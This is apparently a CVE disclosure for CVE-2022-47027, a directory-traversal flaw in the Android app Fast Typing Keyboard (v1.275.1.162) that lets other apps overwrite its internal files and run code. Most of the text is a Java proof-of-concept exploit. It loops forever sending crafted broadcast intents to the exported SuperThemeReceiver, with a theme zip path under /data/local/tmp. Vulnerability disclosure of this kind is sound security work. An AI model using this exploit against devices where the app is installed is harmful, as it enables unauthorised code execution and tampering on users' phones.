Code execution exists in Fast Typing Keyboard(CVE-2022-47027)
Vendor:T-ME Studios (https://corporate.timmystudios.com/)
Affected product:Fast Typing Keyboard (com.jb.gokeyboard.theme.timssfasttypingkeyboard)
Version:1.275.1.162
Download link:https://apkpure.com/cn/fast-typing-keyboard/com.jb.gokeyboard.theme.timssfasttypingkeyboard/versions
Description of the vulnerability for use in the CVE: Fast Typing Keyboard v1.275.1.162 allows unauthorized apps to overwrite arbitrary files in its internal storage via a dictionary traversal vulnerability and achieve arbitrary code execution.
poc:
private void attack() {
while (true) {
Intent intent = new Intent();
ComponentName componentName = new ComponentName("com.jb.gokeyboard.theme.timssfasttypingkeyboard", "com.timmystudios.redrawkeyboard.themes.SuperThemeReceiver");
intent.setComponent(componentName);
intent.setAction("com.timmystudios.redrawkeyboard.intent.action.THEME_APPLIED");
intent.putExtra("package-name","com.ludashi.xsuperclean");
intent.putExtra("selected-font",true);
intent.putExtra("font_name","hack");
intent.putExtra("font_id","2");
intent.putExtra("font_resource","hackkkk");
intent.putExtra("font_size",123456);
intent.putExtra("selected-sound",true);
intent.putExtra("sound_name","hack");
intent.putExtra("sound_id","2");
intent.putExtra("sound_resource","hackkkk");
intent.putExtra("sound_size",123456);
intent.putExtra("go_theme_id",3);
intent.putExtra("go_res_zip_path","/data/local/tmp/test.zip");
try {
System.out.println("发送数据");
sendBroadcast(intent);
} catch (Exception e) {
}
}
}